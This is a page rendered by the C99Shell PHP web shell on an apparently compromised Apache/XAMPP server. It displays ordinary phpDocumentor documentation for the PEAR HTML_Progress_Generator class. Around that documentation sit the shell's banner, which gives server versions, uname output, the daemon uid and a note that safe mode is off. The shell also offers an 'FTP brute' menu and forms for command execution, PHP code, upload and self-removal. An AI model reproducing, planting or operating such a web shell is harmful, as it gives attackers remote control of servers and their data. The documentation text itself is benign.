!C99Shell v. 2.1 [PHP 8 Update] [02.02.2022]!

Software: Apache/2.4.53 (Unix) OpenSSL/1.1.1o PHP/7.4.29 mod_perl/2.0.12 Perl/v5.34.1. PHP/7.4.29 

uname -a: Linux vps-2738122-x 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64 

uid=1(daemon) gid=1(daemon) grupos=1(daemon) 

Safe-mode: OFF (not secure)

/opt/lampp/lib/php/doc/HTML_Progress/docs/TDG/HTML_Progress/Progress_UI/   drwxr-xr-x
Free 13.07 GB of 61.93 GB (21.1%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     HTML_Progress_Generator.html (14.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Docs For Class HTML_Progress_Generator
HTML_Progress
[ class tree: HTML_Progress ] [ index: HTML_Progress ] [ all elements ]

Class: HTML_Progress_Generator

Source Location: /Progress/generator.php

Class Overview

HTML_QuickForm_Controller
   |
   --HTML_Progress_Generator



Methods



Class Details

[line 42]


[ Top ]


Class Methods


constructor HTML_Progress_Generator [line 110]

HTML_Progress_Generator HTML_Progress_Generator( [mixed $controllerName = 'ProgressGenerator'], [array $attributes = array()], [array $errorPrefs = array()], string $controllerName(optional))

Constructor Summary

  • Creates a progress bar generator wizard with customized actions: progress bar preview, form rendering, buttons manager
    1. $controllerName = 'myPrivateGenerator';
    2. $attributes = array(
    3. 'preview' => name of a HTML_QuickForm_Action instance
    4. (default 'ActionPreview', see 'HTML/Progress/generator/preview.php')
    5. 'display' => name of a HTML_QuickForm_Action_Display instance
    6. (default 'ActionDisplay', see 'HTML/Progress/generator/default.php')
    7. 'process' => name of a HTML_QuickForm_Action instance
    8. (default 'ActionProcess', see 'HTML/Progress/generator/process.php')
    9. );
    10. $generator = new HTML_Progress_Generator($controllerName, $attributes);




Tags:

throws:  HTML_PROGRESS_ERROR_INVALID_INPUT
access:  public
since:  1.1


Parameters:

string   $controllerName(optional)   Name of generator wizard (QuickForm)
array   $attributes   (optional) List of renderer options
array   $errorPrefs   (optional) Hash of params to configure error handler

[ Top ]

method createButtons [line 270]

void createButtons( object &$page, array $buttons, [mixed $attributes = null])

Adds all necessary buttons to the given page object.



Tags:

throws:  HTML_PROGRESS_ERROR_INVALID_INPUT
access:  public
since:  1.1


Parameters:

object   $page   Page where to put the button
array   $buttons   Key/label of each button/event to handle
mixed   $attributes   (optional) Either a typical HTML attribute string or an associative array.

[ Top ]

method createProgressBar [line 413]

void createProgressBar( )

Creates a progress bar with options choosen on all wizard tabs.



Tags:

access:  public
since:  1.1


[ Top ]

method createTabs [line 228]

void createTabs( object &$page, [mixed $attributes = null])

Adds all necessary tabs to the given page object.



Tags:

throws:  HTML_PROGRESS_ERROR_INVALID_INPUT
access:  public
since:  1.1


Parameters:

object   $page   Page where to put the button
mixed   $attributes   (optional) Either a typical HTML attribute string or an associative array.

[ Top ]

method disableButton [line 374]

void disableButton( object &$page, [array $events = array()])

Disables certain buttons for a page.

Buttons [ = events] : back, next, cancel, reset, apply, help




Tags:

see:  HTML_Progress_Generator::enableButton()
throws:  HTML_PROGRESS_ERROR_INVALID_INPUT
access:  public
since:  1.1


Parameters:

object   $page   Page where you want to activate buttons
array   $events   (optional) List of buttons

[ Top ]

method enableButton [line 328]

void enableButton( object &$page, [array $events = array()])

Enables certain buttons for a page.

Buttons [ = events] : back, next, cancel, reset, apply, help




Tags:

see:  HTML_Progress_Generator::disableButton()
throws:  HTML_PROGRESS_ERROR_INVALID_INPUT
access:  public
since:  1.1


Parameters:

object   $page   Page where you want to activate buttons
array   $events   (optional) List of buttons

[ Top ]


Documentation generated on Sun, 12 Sep 2004 20:23:41 +0200 by phpDocumentor 1.3.0RC3

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.5533 ]--